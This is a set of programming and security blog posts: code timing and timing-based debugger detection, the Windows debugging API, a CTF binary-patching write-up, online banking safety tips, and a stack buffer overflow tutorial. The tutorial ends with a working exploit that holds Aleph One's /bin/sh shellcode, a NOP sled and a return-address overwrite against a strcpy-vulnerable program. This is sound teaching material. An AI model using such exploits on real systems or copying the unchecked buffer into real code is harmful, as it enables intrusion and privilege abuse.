October 4, 2013

Timing Your Code - Inside and Outside a Debugger

Jon Bentley talks about timing software code in his book Programming Pearls. I was recently reading this and thought I'd time my hashtable implementation (source). Windows has two APIs that can help in doing this: QueryPerformanceFrequency and QueryPerformanceCounter. There are other ways to measure time but I chose these for their high resolution. These APIs provide values from the high-performance counter in the system, if one is present. This counter is like a variable that keeps incrementing many, many times per second. The frequency of increments depends on the specific system you have. MSDN says that sometimes this can be the cycle rate of the processor's clock.

QueryPerformanceFrequency returns this frequency value, and the value does not change while the system is up. My system, for example, has a counter that ticks 2143623 times per second, which translates to a resolution of 466.499940 nanoseconds.

QueryPerformanceCounter returns the value of the counter when it is called. By calling this immediately before and after a block of code, we can calculate the number of increments that took place while the code was running and then convert this to a time value. Both APIs take a pointer to a LARGE_INTEGER variable. If we look in WinNT.h, we see that this is an 8-byte union with members for accessing the two 4-byte halves individually (LowPart, HighPart) or the whole value at once (QuadPart). 8 bytes gives plenty of bits to hold the counter value.

Coming to the timing of the hashtable implementation: I timed only the insertion operation, using a DWORD type for both key and value. I ran the tests with a different number of entries each time: 50000, 100000, 700000, 8388608(1<<23), 16777216(1<<24). I initially had a count of 33554432(1<<25) and this run failed because of an out-of-memory condition! By default, each 32-bit process is limited to 2GB of user-mode address space. Part of the scaffolding code I used for this is here:

LARGE_INTEGER freq = {0};
LARGE_INTEGER counterStart = {0};
LARGE_INTEGER counterEnd = {0};

LONGLONG elapsedCounts = 0;
double elapsedTime[MAX_RUNS] = {0};

int numRuns = 0;
int sizes[MAX_RUNS] = { 50000, 100000, 700000, 1<<23, 1<<24 };

DWORD dwError = 0;
BOOL testSuccess[MAX_RUNS] = {TRUE};

// This retrieves the counts per second
if(!QueryPerformanceFrequency(&freq))
{
    dwError = GetLastError();
    wprintf(L"testHashtable(): QueryPerformanceFrequency() failed %d\n", dwError);
    return;
}

while(numRuns < MAX_RUNS)
{
    wprintf(L"Beginning run %d\n", numRuns);

    // Begin counter
    if(!QueryPerformanceCounter(&counterStart))
    {
        dwError = GetLastError();
        wprintf(L"testHashtable(): QueryPerformanceCounter() failed %d\n", dwError);
        return;
    }

    //
    // Code to test
    //
    testSuccess[numRuns] = testHashtable(HT_KEY_DWORD, HT_VAL_DWORD, 
                                         sizes[numRuns], FALSE);

    // End counter
    if(!QueryPerformanceCounter(&counterEnd))
    {
        dwError = GetLastError();
        wprintf(L"testHashtable(): QueryPerformanceCounter() failed %d\n", dwError);
        return;
    }

    // Get the elapsed time
    elapsedCounts = counterEnd.QuadPart - counterStart.QuadPart;
    elapsedTime[numRuns] = (double)(elapsedCounts / (double)freq.QuadPart);
    ++numRuns;
}

wprintf(L"Performance counter ticks %I64u times per second\n", freq.QuadPart);
wprintf(L"Resolution is %lf nanoseconds\n", (1.0/(double)freq.QuadPart)*1e9);

wprintf(L"%16s %13s %19s %s\n-----------------------------------------------\n",
        L"RunSize", L"TimeSeconds", L"TimeMicro", L"Result");

for(numRuns = 0; numRuns < MAX_RUNS; ++numRuns)
{
    wprintf(L"%16d %5.8lf %16.3lf %s\n", sizes[numRuns], elapsedTime[numRuns], 
                                         elapsedTime[numRuns] * 1e6, 
                                         testSuccess[numRuns]?L"PASSED":L"FAILED");
}

This code gave the following output:

--[ Hashtable insertion operation ]--

** Release mode, running inside Visual Studio **
         RunSize   TimeSeconds           TimeMicro Result
---------------------------------------------------------------
           50000 3.25054825      3250548.254 PASSED
          100000 6.17252521      6172525.206 PASSED
          700000 45.90315601     45903156.012 PASSED
         8388608 648.03144909    648031449.093 PASSED
        16777216 1480.01800177   1480018001.766 PASSED
---------------------------------------------------------------

** Release mode, running outside in a command window **
         RunSize   TimeSeconds     TimeMicro Result
---------------------------------------------------------------
           50000 0.07000345        70003.447 PASSED
          100000 0.12546702       125467.025 PASSED
          700000 0.98070789       980707.895 PASSED
         8388608 11.25297219     11252972.188 PASSED
        16777216 19.48300751     19483007.506 PASSED

As you can see from the results above, the interesting lesson is how much processing time increases when running under a debugger. In these tests, running under a debugger was orders of magnitude slower than otherwise. To see whether this really was the case even with simple code, I timed the execution of a system API - GetCurrentThread() - using the same technique. To get consistent times I executed the API multiple times in a for loop. Here are the results. We see the same increase in execution time. RunSize is the number of times GetCurrentThread() was executed in TimeSeconds seconds. Do note that this API took only ~336 microseconds to execute 100,000 times on my Core i7 powered laptop. That is blazing fast!

--[ Multiple Calls to GetCurrentThread() ]--

** Release mode, inside Visual Studio **
         RunSize   TimeSeconds TimeMicro
---------------------------------------------------------
             500 0.00000746            7.464
           50000 0.00062698          626.976
          100000 0.00125349         1253.485

** Release mode, running outside in a command window **
         RunSize   TimeSeconds TimeMicro
---------------------------------------------------------
             500 0.00000187            1.866
           50000 0.00016747          167.473
          100000 0.00033635          336.346

This brings us to another interesting idea, one that is probably already in use: a program can use this technique to check whether it is running under a debugger. I recall reading somewhere that using IsDebuggerPresent() is not a fool-proof way of determining this, so timing checks may well be better. However, we must account for the fact that processing times vary widely depending on the system hardware and the system load at the time. What can be done is to draw up a table of expected processing times for a particular operation across various hardware configurations and system loads. Then, when our program is running, we time the same operation and compare it against the table. The program must be able to determine the hardware configuration(the CPUID instruction comes to mind) and the system load(can do this by querying Windows - #processes, memory used,...) and use this information to make a good comparison.

September 17, 2013

Windows Debugging API - Part 1

I recently started exploring the debugging APIs available in Microsoft Windows. Using these APIs, one can write one's own debugger, process tracer/analyzer and what not. My goal is to write a full-fledged debugger using only Win32 APIs by the end of this learning stage. In today's post, I will explain what I have learned so far - some of the debugging APIs themselves and a sample implementation of a so-called process tracer, for lack of a better name, which uses those APIs.

The debugging APIs available in the Windows OS have remained largely unchanged for many years now. Articles written way back in the 90s and 2000s are relevant even today. Scroll down to the end of this post to find some references that I have used so far. Before going into the details of the APIs themselves, I will enumerate the tasks that a debugger should be able to perform in order to satisfy the user's requirements.

  1. First and foremost, the debugger must enable the user to fully control the execution of the process to be debugged, called the target process from here on. This means that the user must be able to start and stop execution of the target by setting breakpoints, single stepping, breaking all threads immediately and so on.
  2. The user must also be able to control the data that the target process uses - register contents(even the EIP register to alter control flow), stack and heap contents, global variables and so on.
  3. Provide at least a disassembly of the code that the target process is executing whenever the user wishes to examine it.
  4. It must provide all details about the target process during its execution - threads, child processes, register and memory contents, loaded modules(DLLs), address in memory of the modules, current stack layout and so on.
The Windows debugging APIs consist of:
  • WaitForDebugEvent: The caller is blocked for the amount of time indicated or until a debug event occurs in the target process. When this function returns TRUE, a debugging event has occurred and at this point the target process has been suspended completely. The debugger(caller) is free to process the debug event, update its own UI and do other work.
  • ContinueDebugEvent: Once the debugger(caller) has processed the debug event, it has to call this function in order to let the target process continue execution.
  • DebugActiveProcess: This enables the debugger to attach to an already running process in the system.
  • DebugActiveProcessStop: DebugActiveProcess() function's counterpart. This is used to detach the debugger from the target process. Once this is done, the target process is no longer under the control of the debugger and the debugger will not receive any debug events.

There are other debugging APIs which I have not used so far, so I will explain them in a future post. They are: DebugSetProcessKillOnExit(), DebugBreakProcess() and CheckRemoteDebuggerPresent(). Important APIs that are not specific to debugging but are very necessary for accomplishing the tasks of a debugger:

  • CreateProcess(): This is used to create the target process as a new process with the DEBUG_PROCESS or the DEBUG_ONLY_THIS_PROCESS flag which enables the calling thread in the debugger to receive debug events from this target process.
  • SuspendThread() and ResumeThread(): Suspend and resume a thread in the target process.
  • TerminateThread() and TerminateProcess(): To terminate a thread or the target process itself.
  • ReadProcessMemory() and WriteProcessMemory(): To read and write to the memory contents of the target process. These are essential because there is no direct way to access the target process's memory like using a pointer in the debugger. This is because the target process, obviously, is created in a different virtual address space than the debugger.

Before going into the details of the APIs, I will give a brief overview of the various events that a debugger receives when it is attached to a target process. A DEBUG_EVENT structure is sent along with each debug event. This structure contains the target PID, the thread ID where the debug event occurred and an associated inner structure that is filled with information related to the corresponding event. These structures contain very useful information about the target process. The debug events sent are:

  • CREATE_PROCESS_DEBUG_EVENT: This event is the very first event sent to the debugger when it creates a new target process or attaches to an existing process. The associated structure is CREATE_PROCESS_DEBUG_INFO. Important fields are:
    • hProcess, hThread: handle to target process and the first thread.
    • hFile: Handle to the executable file of the target process. Use this to read information about the target binary, perhaps for disassembly purposes. You must close this handle once you are finished using it.
    • lpBaseOfImage: The starting address of the executable image mapped into memory. For PE binaries, you will see that this points to the DOS header with "MZ" at the start.
  • CREATE_THREAD_DEBUG_EVENT: Event sent whenever a thread is created in the target process. The associated structure is CREATE_THREAD_DEBUG_INFO. The hThread member in this gives a handle to the thread.
  • LOAD_DLL_DEBUG_EVENT: This is sent when a DLL is loaded into the target process. hFile is the handle to the loaded DLL and can be used to obtain the image name of the DLL and must be closed after use. lpBaseOfDll gives the address at which the DLL is loaded in the target process's address space.
  • OUTPUT_DEBUG_STRING_EVENT: This is a special event that is sent when the target process makes a call to the OutputDebugString() function. It exists especially so that the target process can communicate with the debugger. The associated OUTPUT_DEBUG_STRING_INFO structure contains the information needed to retrieve the string value passed to OutputDebugString(). lpDebugStringData gives the starting address of the string and nDebugStringLength gives the number of characters in the string. fUnicode specifies whether the string is a wide-char string or not. ReadProcessMemory() must be used to actually read the string value from the target process's address space. Keep in mind that if it is a Unicode string then you will have to read length*sizeof(WCHAR) bytes in order to read the full string.
  • EXIT_PROCESS_DEBUG_EVENT and EXIT_THREAD_DEBUG_EVENT: Counterparts of the respective create events. Keep in mind that you will have to remember the PID of the target process so that when you receive the EXIT_PROCESS_DEBUG_EVENT with this PID, you will know that the target process has exited.
  • UNLOAD_DLL_DEBUG_EVENT: Sent when a DLL is unloaded in the target process. The only member in the associated UNLOAD_DLL_DEBUG_INFO structure is lpBaseOfDll, which is the same as before. Note that there is no information about which DLL is being unloaded. The debugger has to remember this itself by mapping the DLL's base address to its name when it gets the LOAD_DLL_DEBUG_EVENT, and can then use this mapping when it receives the unload event.
  • EXCEPTION_DEBUG_EVENT: Sent to the debugger whenever an exception occurs in the target process. The structure EXCEPTION_DEBUG_INFO has information about the exception itself. A first-chance exception means the exception has not yet been delivered to the target process. The debugger is the first one to receive it and can make use of it before it reaches the target process. This is useful when the debugger sets breakpoints, which result in breakpoint exceptions. In this case, the debugger handles the breakpoint exception and continues the target process; the target won't even know that an exception occurred. If the debugger cannot handle the exception then it is passed on to the target process. The exception debug information structure also contains the exception code, which indicates the kind of exception that occurred. There is a lot more detail to be written regarding the exception debug event and I will reserve that for the second part of this post.

Now, there are two starting points for debugging a target process - first is to create the new process as a child of the debugger using the CreateProcess() API and second, attach to a process that is already running using the DebugActiveProcess() API. Likewise, there are two ways to end a debug session - terminate the target using TerminateProcess() API or simply detach from the target using DebugActiveProcessStop() API and let it continue executing. Going into the specifics now...

Creating a new target process
You must specify the DEBUG_PROCESS or the DEBUG_ONLY_THIS_PROCESS flag while creating the new target process so that the debugger has full access to it. When CreateProcess() returns, you get the PID of the newly created target process and handles to the target process and its main thread. It is better to close these handles right away since we get them again later when the debugger receives the CREATE_PROCESS_DEBUG_EVENT. Once you create the target process, debug events start arriving, beginning with CREATE_PROCESS_DEBUG_EVENT.

Attaching to an active target process
When DebugActiveProcess() function is called, the target process is first suspended by Windows. Then the following events are sent to the debugger: CREATE_PROCESS_DEBUG_EVENT and CREATE_THREAD_DEBUG_EVENT for the main process and thread, CREATE_THREAD_DEBUG_EVENT for all other threads currently in the target process and LOAD_DLL_DEBUG_EVENT for all loaded DLLs. Windows sends one EXCEPTION_DEBUG_EVENT with exception code 0x80000003(breakpoint) before resuming execution of the target process. So once the debugger continues this exception, the target process is resumed and now any debug event may be sent to the debugger as and when they are generated.

Receiving debug events
Debug events are sent to the debugger - specifically, to the thread within the debugger that called either CreateProcess() or DebugActiveProcess() - once it is attached to the target process. In order to receive these events, the debugger must call the WaitForDebugEvent() API. This blocks the calling thread until a debug event is sent or the specified time runs out. If a debug event arrives within the specified timeout, a DEBUG_EVENT structure is filled in as described earlier. Calling ContinueDebugEvent() resumes execution of the target process.
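
Putting the APIs together, the core of a debugger is a simple loop. In pseudo-code (mirroring the Win32 calls and event names described above):

```
debugging = TRUE
while(debugging)
{
    WaitForDebugEvent(&dbgEvent, INFINITE)    // blocks until an event arrives

    switch(dbgEvent.dwDebugEventCode)
    {
        CREATE_PROCESS_DEBUG_EVENT: remember hProcess/hThread; close hFile
        LOAD_DLL_DEBUG_EVENT:       record base -> DLL name; close hFile
        UNLOAD_DLL_DEBUG_EVENT:     look up base -> DLL name
        EXCEPTION_DEBUG_EVENT:      handle our breakpoint, or pass it on
        EXIT_PROCESS_DEBUG_EVENT:   debugging = FALSE
    }

    // Let the suspended target run again
    ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId,
                       continueStatus)
}
```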

Closing a debug session
Similar to starting a debugging session, there are two ways to end it.
First is to terminate the target process and the second is to simply detach the debugger from the target process and let it continue execution. Termination of a process is done via the TerminateProcess() API. Many people recommend not using this because it immediately terminates the target process without invoking any cleanup code in the target. However, if the user wants to stop debugging, the target process must be terminated this way, because giving it a chance to clean up first is the total opposite of wanting to terminate it. Think about it - if you are debugging malware you would not want to give it a chance to clean up, would you?

Coming back to TerminateProcess() now. There is one thing you should absolutely remember not to do: do not exit the debug thread as soon as you call TerminateProcess. Doing so keeps the target process in an infinite wait state and it cannot even be killed. See the appendix for an explanation. Once TerminateProcess() has been called, the target process is suspended and Windows sends UNLOAD_DLL_DEBUG_EVENT for all loaded DLLs, EXIT_THREAD_DEBUG_EVENT for all threads and finally a EXIT_PROCESS_DEBUG_EVENT. Once all these events are processed, Windows calls CloseHandle and other clean-up code for any resources held by the target process and then proceeds to remove the process from the system.

Second, detaching from the target process is by calling the DebugActiveProcessStop() API. This simply causes the debugger to stop receiving any further debug events and closes all the debugger's open handles to the target process. From now on, the target process continues executing without an attached debugger. Any exception that occurs is handled by Windows the same way as for any other process.

Using these APIs
I wrote a small GUI program called ProcessTracer that receives debug events and displays them to the user. Source code for this can be found in Github here: ProcessTracer git repo.

Appendix

Terminating the target process
When TerminateProcess() is called, the target process is suspended just like when a debug event occurs. Windows then sends multiple UNLOAD_DLL_DEBUG_EVENTs and EXIT_THREAD_DEBUG_EVENTs followed by a final EXIT_PROCESS_DEBUG_EVENT. All this happens without the target process being resumed at all. So if the debugger does not process these events by calling ContinueDebugEvent() then the target process is in a wait-forever state within a kernel thread. Since this is in a kernel mode wait state it cannot be killed. See this article for an explanation of un-killable processes.

July 18, 2013

Modifying a Binary File?

In this post I will be talking about how I cracked one of the CTF challenges during the final semester in my university. The CTF competition was part of the Network Security course and was held for two days over a weekend in spring. Those two days were one of the most exciting times I have spent in front of a computer. The adrenaline rush of solving problems and getting points awarded is something that only the participants will know about.

So, coming to the challenge I'm talking about. Given were: a program binary that provides encryption/decryption services, an encrypted message and the key that was used to encrypt the message. The challenge was to decrypt the encrypted message. But.... Decryption capability in the program binary was disabled! The program took the following command line arguments "Usage: ./crypt INPUT-FILE OUTPUT-FILE KEY (DECRYPT|ENCRYPT)". So if we mentioned "DECRYPT" it would output "NO DECRYPT ENABLED !!!". Okay, so I opened up the GNU debugger gdb and started stepping through code to see where the command line arguments were processed. I observed that the function names were still preserved, although mangled by the C++ compiler. There were two functions, '_Z7decryptSsSs' and '_Z7encryptSsSs', apart from the 'main' function. Stepping one instruction at a time through the main function, I found the code where the command line argument was being checked for DECRYPT/ENCRYPT. Here it is:

Observe that the code checks only whether the fifth argument's first character is 'D' ('D' is hex 0x44). If it is 'D', register al is set to 1 and the stack variable at [ebp-0x239] receives the value of al. The code then checks whether this value is zero, meaning 'E' was the first character of the fifth argument, and jumps based on this comparison. If the jump is not taken, the code calls std::cout to print the "NO DECRYPT ENABLED !!!" message and exits. When "ENCRYPT" was passed, the jump was taken and the stack variable [ebp-0x239] was used further down in the code when deciding whether to call _Z7encryptSsSs() or _Z7decryptSsSs(). The basic steps the code takes are shown in this pseudo-code:

main()
{
  // x = ebp-0x239
  al = (argv[4][0] == 'D')? 1 : 0;
  x = al;
  if(x == 0) goto do_not_exit;
  std::cout << "NO DECRYPT ENABLED !!!\n";
  exit_program

  do_not_exit:
  read input file
  read key file
  open output file
  if(x == 1)
    call _Z7decryptSsSs()
  else
    call _Z7encryptSsSs()
  exit_program
}

As you can see there are two places where the control flow changes. Two ideas came to my mind on that day.

  1. Control the stack variable 'x' so that the correct branches are taken even though "DECRYPT" is passed.
  2. Change the binary file so that the call to the encrypt() function gets replaced with a call to the decrypt() function.
I chose the first option since it was easier. However, I didn't quite succeed because the value at [ebp-0x239] was being overwritten when some library functions were called. GDB has functionality that lets you watch a memory location and break whenever a read/write operation is performed from/to it. I tried using this but got tangled up in the multiple places where this memory area was accessed. It was taking too much time, so I turned to the second option. For changing the binary file, all I had to do was modify the target of the call instruction to point to the decrypt function instead of the encrypt function. The Intel near call instruction takes its target as a relative offset: the CPU computes EIP = EIP + offset, where EIP has already advanced past the call instruction itself. See the disassembly below:

The call instruction at 0x080494ee is "e8 e1 f8 ff ff". The call opcode is 0xe8 and the code_offset is 0xfffff8e1, stored little-endian. All we have to do is replace the immediate value 0xfffff8e1 with the new offset 0xfffffa1b. This will be the new offset that the call instruction uses. Simple enough, right? Well... sort of. This binary was a 32-bit ELF binary. We can use "objdump -h" to find out the offsets of the important sections of a binary file. What we are interested in is the offset of the .text section. The output of "objdump -h" (only .text information shown here):

The .text section starts at offset 0xd20 in the binary file and its virtual address is 0x08048d20. The call instruction is at virtual address 0x080494ee, so 0x080494ee - 0x08048d20 = 0x7ce. This is the distance between the start of the .text section and the call instruction. Therefore, the call instruction is at offset 0xd20 + 0x7ce = 0x14ee in the binary file. The call instruction format is "opcode(1byte) code_offset(4bytes)". So we have to replace the integer(4 bytes) at offset 0x14ee+1 with 0xfffffa1b. I wrote a program to do this by memory-mapping the binary and replacing the code_offset. Of course, we could simply open the file, seek to 0x14ee+1 and write an integer there, but the reason I used memory mapping is that I wanted to see whether I was modifying the correct place in the binary file, and memory-mapping makes this easy since you can view the file contents in the memory window of a debugger. A small snippet of the code that makes the modification:

WCHAR *szFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt";
WCHAR *szOutFile = L"C:\\Users\\Shishir\\CTF\\kes\\crypt_new";
HANDLE hFile = NULL, hFileObj = NULL, hFileView = NULL;

DWORD dwFileSize = 0;

wprintf_s(L"Using input file: %s\n", szFile);

if( ! fOpenAndMapFile(szFile, &hFile, &hFileObj, 
        &hFileView, &dwFileSize) )
{
  wprintf_s(L"Error opening input file\n");
  return 1;
}

unsigned char *fptr = (unsigned char*)hFileView;

// Seek to offset where the call instruction's code_offset is
fptr += 0x14ee + 1;
    
unsigned int *iptr = (unsigned int*)fptr;
int old_data = *iptr;
int new_data = 0xfffffa1b;
*iptr = new_data;

Once this was done, I took the modified binary and ran objdump on it: the call instruction at 0x080494ee was now pointing to the decryption routine _Z7decryptSsSs()!! Note that the virtual address, 0x080494ee, is where the call instruction is in both the modified code that follows and the previous screenshot.

Executed the program by giving "ENCRYPT" as the fifth argument and got the decrypted message in the output file! Now, this was possible because the decryption and encryption routines had the same function signatures - the same arguments especially - so the code that set up arguments on the stack before the call to _Z7encryptSsSs() did not have to be changed.

Well, after submitting the flag and getting rewarded handsomely with points, I spoke to a fellow student who did it in a different, easier way. GDB allows you to control the contents of any register during debugging. So all you have to do is break the program before each of the branching decision points and change the value of the EIP register so that the correct branch is taken even though you specify "DECRYPT" at the command line. Anyway, it was fun playing around with gdb, objdump and the binary file, even though my method was more complicated!

This actually brings us to the topic of packers. A packer, in the context of computers and security, is a program that can compress and/or encrypt a binary file that is provided as input. This is how many of today's software programs are distributed in order to protect Intellectual Property. The compressed/encrypted binary is the one that is distributed to consumers. This supposedly prevents competitors and crackers from reverse engineering the binary and stealing the code implemented by a company. You might ask how the OS manages to run these 'packed' programs. When a binary file is packed, the unpacker is included as part of the final output of the packer. So executing the output binary file actually first invokes the unpacker which has the logic and information to unpack - decompress and/or decrypt - the rest of the binary and then execute the unpacked program. The unpacked program is usually run by creating a child process by the unpacker. UPX is a popular open-source packer.

Even with a packed binary, we can still read the original code, although it is a little more difficult. This difficulty arises because many packers are clever enough to not unpack everything at once. Unpacking may be done 'on-demand' and in-memory. So the challenge is to determine when the unpacking process has finished, at which point we can dump the process's memory to disk for later analysis. The dump will hopefully contain the whole binary in unpacked form to facilitate disassembly. This is why one must never depend on the assumption that the source code will never be leaked. Remember, security through obscurity never works. The topic of packers and anti-packing techniques is very interesting. I will write about it, maybe in a later post. That's it for now!

May 23, 2013

Online Banking Safety

Online banking is getting more and more popular these days and it is not without reason that it is so pervasive. As the world goes towards higher levels of connectivity, online banking looks like a very convenient, easy-to-use option for many of the internet connected individuals all over the world. It is here to stay for a long time to come. However, as is with everything else on the internet, online banking has its own set of security issues and problems. Most people are still in the dark about these issues and have no clue about the dangers of carrying out online banking. See this blog for a proof-of-concept that shows how even the two-factor authentication mechanism, used by banks to verify customers online, can be bypassed. There are a couple of popular malicious software kits that can be used to carry out attacks against online banking customers - Zeus, SpyEye and their mobile phone counterparts ZitMo and SpitMo.

In this post, I will enumerate the important things you can do to stay safe while continuing to use online banking. These points should be followed in addition to general security practices like keeping software patched and running up-to-date antivirus software. I will keep this post short and will not go into a detailed explanation of each step. Keep in mind that security and usability are inversely proportional, and as such you must give up usability to a certain extent in order to gain an increased level of security. On any day I would go in for more security than usability because that would give me peace of mind!

--[ System/OS Security ]--
Although the browser is the program you use to access banking websites, it is the underlying Operating System and related software that must be secured first, because no matter how secure the browser is, a keylogger can capture your typed-in password even before it reaches the browser.

  • Having a squeaky clean OS before accessing your bank's website is a must. This means the computer must have no trace of any malicious programs such as trojans, viruses and backdoors. Bootkits pose a more serious problem but I'll leave it for another blog post.
  • The people at Software Protection Initiative have come out with a lightweight Linux based OS that boots from a CD or USB-stick every time. Since the OS can only be booted from the live CD or USB-stick, it is ensured that each session starts in a trusted state. No malware ever gets 'installed' on the system. Simply restarting the system enables you to start from a clean state. Download the latest ISO image here. Read more about the OS here.
  • One disadvantage of this approach is having to reboot your machine after inserting the live CD or USB-stick. An easier but less secure option is to boot this OS inside a Virtual Machine (VM). I have personally used Oracle's VirtualBox to boot this OS and it works just fine. This option is less secure because the host OS (the OS on which the VM runs) cannot be trusted - a keylogger installed in the host OS can still capture your keystrokes.
  • Always boot a new session immediately before accessing your banks' websites. The LPS OS comes installed with Firefox for browsing. Also, this Firefox comes with the HTTPS-Everywhere plugin that enforces use of the secure HTTP protocol(HTTPS) whenever available.

--[ Browser Security ]--
The browser is the main software program you use to access your bank's website and in which you perform various tasks - checking account balance, transferring funds, adding peer accounts and so on. Having a secure browsing environment is a must and everyone should make it a priority.

If you choose not to use the live CD/USB option, then you must at least have a secure browser software, apart from having up-to-date antivirus and other up-to-date software patches.

  • First of all, we must try to use the secure version of HTTP, i.e., HTTPS, for all websites that offer it. To make this easy for users, the Electronic Frontier Foundation has come up with a plug-in for the Firefox and Chrome web browsers - HTTPS Everywhere. This plug-in enforces the use of the HTTPS version of every website that offers one, ensuring that the connection between your browser and the bank's server is encrypted and thus kept confidential from attackers in the network.
  • Second, prevent malware from being installed on your system. Most malware gets installed via drive-by downloads, which plant malware on a user's computer without his/her knowledge. Install the NoScript plug-in for Mozilla Firefox or ScriptSafe for Google Chrome. These plug-ins block JavaScript, IFrames, XSS and other attack vectors.
  • Since Java has been attackers' most favored base for exploits, please disable the Java plugin in your browsers. In Firefox, go to Tools > Add-Ons > Plugins and disable the Java SE and Java Deployment Toolkit plugins. In Chrome, enter "chrome://plugins/" in the address bar and click 'Disable' for the Java plugin. For other browsers see here. You can disable the Shockwave Flash plugin in the same way, since most bank websites do not use Flash content.
  • Keep an eye on the address bar of your browser for any abnormality in the website address. Depending on the font used, two different characters may look alike while pointing to very different websites - GOOGLE.COM vs. G00GLE.COM (zeros in place of Os), PAYPAI.COM vs. PAYPAL.COM (capital 'I' in place of 'l'), rnicrosoft.com vs. microsoft.com ('rn' mimicking 'm'). If a website address appears to be different, copy it into the Notepad application and choose a monospace font such as Courier New; in that font you can clearly see the difference between characters. Do this even for links before you click them: copy the target address of a hyperlink to Notepad and perform the same verification.
  • Type the complete website address starting from 'https' manually and do not reach your bank website by clicking on any link. This ensures that you reach the intended website only.
  • Use two different browsers - one solely for online banking and the other for everything else you do on the internet. The one you use for online banking must be locked down using the plugins mentioned above.

May 22, 2013

Stack-buffer Overflow Vulnerability

We read about so much malware causing havoc in today's computers. How does it get into a computer in the first place? Memory vulnerabilities are one of the main ways in which malware exploits a target computer.

The goal of any malware writer is to somehow get his malicious code executed on the victim computer. There are two ways to go about this. One is to make the user himself execute the malicious executable, for example via a phishing email that asks the user to open a malicious attachment. However, the malicious code often has to run with elevated privileges, like an admin account, to perform its evil deeds. The other way is to inject the code into a running process that already has admin privileges and cause the CPU to execute the injected code while that process runs, so the malicious code inherits those admin privileges. This requires that the victim process take some user input through which the malicious code can be injected. For this to work, there are two phases - Code Injection and Instruction Pointer hijacking. Code Injection is inserting the malicious code - shell code - into the victim process's memory by supplying it as unfiltered user input, and Instruction Pointer hijacking is making the instruction pointer register (EIP) point to the injected code. IP hijacking is also called Control Flow hijacking because the program's control flow is redirected to the injected code.

Code Injection is pretty straightforward because many programs take input from the user without filtering it for malicious content. The program takes the input and places it somewhere in memory - stack or heap. From there on, the malware writer's task is to ensure that the CPU executes this injected code in the near future by modifying the contents of the EIP register.

To understand how EIP can be modified, we first need to understand the memory layout of a process. There are 4 basic sections in a process's memory - text, data, heap and stack. In most systems the stack grows down, i.e., with two nested function calls, function1's frame will be at a higher address than function2's frame - e.g., 0xff88 vs. 0xff18. This doesn't mean that an array allocated on the stack also grows downwards! For example, an array whose base address is 0xff20 with a size of 20 bytes will have its last byte at 0xff33 and NOT at 0xff0d. A very good article about process memory layout is Anatomy of a program in memory. So basically, when a function is called, the return address is stored on the stack by the caller. When the callee returns, the saved address is popped off the stack into the EIP so the CPU continues executing inside the caller. If we can modify this saved return address, we indirectly control the EIP.

--[ Stack Buffer Overflow ]--
This is the most basic vulnerability to understand and exploit. What is surprising is that this attack was discovered back in the 1990s and is still being used in exploits today; a simple Google search yields multiple results about recent attacks. I will use the following program to explain the vulnerability.

// stack_vuln.exe
#include <stdio.h>
#include <string.h>

void foo(char *user_str)
{
    char local_str[64];
    strcpy(local_str, user_str);
}

int main(int argc, char *argv[])
{
    if(argc != 2)
    { printf("usage: %s <in_string>\n", argv[0]); return 1; }
    foo(argv[1]);
    return 0;
}

User input is supplied via a command line argument and is passed to the function foo() by main(). foo() has a local char array of size 64, i.e., allocated on the stack. It simply copies the contents of the formal parameter user_str to the local char array using strcpy(). Remember that strcpy() is very unsafe to use because it performs no bounds checking - it is very easy to overwrite the destination buffer. This is the vulnerability being exploited here. Let's look at the stack when control is inside foo(), just before the call instruction to strcpy() executes.

When strcpy() is passed the address of local_str as the destination buffer, it copies the contents of user_str to local_str until a '\0' is encountered. If the source buffer contains a '\0' within the first 64 bytes, everything is fine. But if the source is 72 bytes long, it overflows the destination buffer and overwrites the saved EBP and ret_addr. When foo() executes the return instruction, ret_addr is popped off the stack into the EIP. So if the value of ret_addr can be modified, EIP can be controlled.

So how is this exploitable? A classic exploit is to have the remote machine open up a shell for the attacker. We can use Aleph One's shell code, 46 bytes in size, as our payload: the buffer overflow vulnerability is the attack vector and the shell-spawning code is the payload. We have the shell code, but we must still come up with an exploit string to give as input to the vulnerable program. The exploit string should be laid out like this:

/*
 *         ** Exploit string layout **
 *
 * 0 1 2 3 ... 21  |  22 23 ... 67  |  68 69 70 71
 *      NOPs          shell_code     sip overwrite addr
 *
 */

  • We have a 64 byte vulnerable buffer on the stack and we have to write 72 bytes so that the saved EIP is overwritten.
  • We have 72-46-4 = 22 bytes extra space in the exploit string. We will use this to hold NOPs (0x90 instruction) to be used as a landing area. Index 0-21 will hold NOPs.
  • We store the shell code just behind the EIP overwrite address. Index 22-67 will hold the shell code.
  • The last 4 bytes will overwrite the saved EIP, so the exploit string's last 4 bytes must hold an address that lands in the NOP area just ahead of our shell code. This is calculated by determining the address of the vulnerable buffer on the stack by running stack_vuln.exe in a debugger.
  • This exploit string will be supplied as the first argument to stack_vuln.exe program.

An example exploit string construction may be as follows. Assuming the vulnerable local_str[] buffer starts at 0xbffffc28, we choose 0xbffffc2e (a few bytes into the NOP landing area) as the target EIP value and come up with the exploit string below. See also how it lines up in the stack area: the saved ret_addr gets overwritten with 0xbffffc2e.

We execute stack_vuln.exe using the execve() system call as follows:

// shellcode from Aleph One's article
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TARGET "./stack_vuln.exe"  // path to the vulnerable binary (adjust as needed)

static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

char szExploit[64+4+4+1];  // 4 for sfp, 4 for sip, 1 for the terminating NUL
unsigned int iBufAddr = 0xbffffc2e;

int main()
{
  char *args[3];
  char *env[1];
  int i, iSCStartIndex;
  unsigned int *iptr;

  args[0] = "stack_vuln.exe";
  args[1] = szExploit;
  args[2] = NULL;
  env[0] = NULL;

  memset(szExploit, 0x90, sizeof(szExploit)-1); // fill with NOPs
  szExploit[sizeof(szExploit)-1] = '\0';        // keep the string NUL-terminated

  iSCStartIndex = 22;
  for(i = 0; i < (int)sizeof(shellcode)-1; ++i)
    szExploit[iSCStartIndex++] = shellcode[i];

  // Place the jump-to-exploit address at the end of our exploit string
  iptr = (unsigned int*)(szExploit+68);
  *iptr = iBufAddr;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}

